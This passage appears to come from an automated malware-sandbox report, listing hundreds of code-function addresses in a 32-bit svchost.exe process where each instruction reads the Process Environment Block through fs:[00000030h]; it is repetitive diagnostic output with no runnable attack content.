                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A197 mov eax, dword ptr fs:[00000030h]7_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov ecx, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC4144 mov eax, dword ptr fs:[00000030h]7_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C156 mov eax, dword ptr fs:[00000030h]7_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC8158 mov eax, dword ptr fs:[00000030h]7_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36154 mov eax, dword ptr fs:[00000030h]7_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C36154 mov eax, dword ptr fs:[00000030h]7_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov ecx, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov eax, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov eax, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov eax, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF0115 mov eax, dword ptr fs:[00000030h]7_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C60124 mov eax, dword ptr fs:[00000030h]7_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB20DE mov eax, dword ptr fs:[00000030h]7_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]7_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C380E9 mov eax, dword ptr fs:[00000030h]7_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB60E0 mov eax, dword ptr fs:[00000030h]7_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]7_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C720F0 mov ecx, dword ptr fs:[00000030h]7_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3208A mov eax, dword ptr fs:[00000030h]7_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC80A8 mov eax, dword ptr fs:[00000030h]7_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF60B8 mov eax, dword ptr fs:[00000030h]7_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]7_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32050 mov eax, dword ptr fs:[00000030h]7_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6050 mov eax, dword ptr fs:[00000030h]7_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5C073 mov eax, dword ptr fs:[00000030h]7_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB4000 mov ecx, dword ptr fs:[00000030h]7_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]7_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]7_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]7_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]7_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A020 mov eax, dword ptr fs:[00000030h]7_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C020 mov eax, dword ptr fs:[00000030h]7_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6030 mov eax, dword ptr fs:[00000030h]7_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]7_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB07C3 mov eax, dword ptr fs:[00000030h]7_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C527ED mov eax, dword ptr fs:[00000030h]7_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C527ED mov eax, dword ptr fs:[00000030h]7_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C527ED mov eax, dword ptr fs:[00000030h]7_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]7_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C347FB mov eax, dword ptr fs:[00000030h]7_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C347FB mov eax, dword ptr fs:[00000030h]7_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD678E mov eax, dword ptr fs:[00000030h]7_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C307AF mov eax, dword ptr fs:[00000030h]7_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CE47A0 mov eax, dword ptr fs:[00000030h]7_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6674D mov esi, dword ptr fs:[00000030h]7_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6674D mov eax, dword ptr fs:[00000030h]7_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6674D mov eax, dword ptr fs:[00000030h]7_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30750 mov eax, dword ptr fs:[00000030h]7_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBE75D mov eax, dword ptr fs:[00000030h]7_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72750 mov eax, dword ptr fs:[00000030h]7_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72750 mov eax, dword ptr fs:[00000030h]7_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB4755 mov eax, dword ptr fs:[00000030h]7_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38770 mov eax, dword ptr fs:[00000030h]7_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]7_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C700 mov eax, dword ptr fs:[00000030h]7_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30710 mov eax, dword ptr fs:[00000030h]7_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C60710 mov eax, dword ptr fs:[00000030h]7_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C720 mov eax, dword ptr fs:[00000030h]7_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C720 mov eax, dword ptr fs:[00000030h]7_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6273C mov eax, dword ptr fs:[00000030h]7_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6273C mov ecx, dword ptr fs:[00000030h]7_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6273C mov eax, dword ptr fs:[00000030h]7_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAC730 mov eax, dword ptr fs:[00000030h]7_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]7_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]7_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]7_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]7_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]7_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]7_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB06F1 mov eax, dword ptr fs:[00000030h]7_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB06F1 mov eax, dword ptr fs:[00000030h]7_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34690 mov eax, dword ptr fs:[00000030h]7_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C34690 mov eax, dword ptr fs:[00000030h]7_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]7_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C666B0 mov eax, dword ptr fs:[00000030h]7_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4C640 mov eax, dword ptr fs:[00000030h]7_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF866E mov eax, dword ptr fs:[00000030h]7_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF866E mov eax, dword ptr fs:[00000030h]7_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A660 mov eax, dword ptr fs:[00000030h]7_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A660 mov eax, dword ptr fs:[00000030h]7_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C62674 mov eax, dword ptr fs:[00000030h]7_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CAE609 mov eax, dword ptr fs:[00000030h]7_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]7_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]7_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]7_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]7_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]7_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]7_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]7_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C72619 mov eax, dword ptr fs:[00000030h]7_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E627 mov eax, dword ptr fs:[00000030h]7_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C66620 mov eax, dword ptr fs:[00000030h]7_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C68620 mov eax, dword ptr fs:[00000030h]7_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3262C mov eax, dword ptr fs:[00000030h]7_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E5CF mov eax, dword ptr fs:[00000030h]7_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E5CF mov eax, dword ptr fs:[00000030h]7_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C365D0 mov eax, dword ptr fs:[00000030h]7_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]7_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]7_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]7_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C325E0 mov eax, dword ptr fs:[00000030h]7_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C5ED mov eax, dword ptr fs:[00000030h]7_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6C5ED mov eax, dword ptr fs:[00000030h]7_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32582 mov eax, dword ptr fs:[00000030h]7_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32582 mov ecx, dword ptr fs:[00000030h]7_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C64588 mov eax, dword ptr fs:[00000030h]7_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E59C mov eax, dword ptr fs:[00000030h]7_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB05A7 mov eax, dword ptr fs:[00000030h]7_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB05A7 mov eax, dword ptr fs:[00000030h]7_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB05A7 mov eax, dword ptr fs:[00000030h]7_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C545B1 mov eax, dword ptr fs:[00000030h]7_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C545B1 mov eax, dword ptr fs:[00000030h]7_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38550 mov eax, dword ptr fs:[00000030h]7_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38550 mov eax, dword ptr fs:[00000030h]7_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6656A mov eax, dword ptr fs:[00000030h]7_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6656A mov eax, dword ptr fs:[00000030h]7_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6656A mov eax, dword ptr fs:[00000030h]7_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC6500 mov eax, dword ptr fs:[00000030h]7_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]7_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]7_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]7_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]7_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]7_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]7_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]7_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]7_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]7_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]7_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]7_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]7_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]7_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]7_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]7_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]7_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]7_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]7_2_03C5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C304E5 mov ecx, dword ptr fs:[00000030h]7_2_03C304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEA49A mov eax, dword ptr fs:[00000030h]7_2_03CEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C364AB mov eax, dword ptr fs:[00000030h]7_2_03C364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C644B0 mov ecx, dword ptr fs:[00000030h]7_2_03C644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]7_2_03CBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]7_2_03C6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CEA456 mov eax, dword ptr fs:[00000030h]7_2_03CEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2645D mov eax, dword ptr fs:[00000030h]7_2_03C2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5245A mov eax, dword ptr fs:[00000030h]7_2_03C5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CBC460 mov ecx, dword ptr fs:[00000030h]7_2_03CBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5A470 mov eax, dword ptr fs:[00000030h]7_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5A470 mov eax, dword ptr fs:[00000030h]7_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5A470 mov eax, dword ptr fs:[00000030h]7_2_03C5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C68402 mov eax, dword ptr fs:[00000030h]7_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C68402 mov eax, dword ptr fs:[00000030h]7_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C68402 mov eax, dword ptr fs:[00000030h]7_2_03C68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E420 mov eax, dword ptr fs:[00000030h]7_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E420 mov eax, dword ptr fs:[00000030h]7_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2E420 mov eax, dword ptr fs:[00000030h]7_2_03C2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C427 mov eax, dword ptr fs:[00000030h]7_2_03C2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]7_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]7_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]7_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]7_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]7_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]7_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]7_2_03CB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C6A430 mov eax, dword ptr fs:[00000030h]7_2_03C6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C50BCB mov eax, dword ptr fs:[00000030h]7_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C50BCB mov eax, dword ptr fs:[00000030h]7_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C50BCB mov eax, dword ptr fs:[00000030h]7_2_03C50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30BCD mov eax, dword ptr fs:[00000030h]7_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30BCD mov eax, dword ptr fs:[00000030h]7_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C30BCD mov eax, dword ptr fs:[00000030h]7_2_03C30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]7_2_03CDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C38BF0 mov eax, dword ptr fs:[00000030h]7_2_03C38BF0
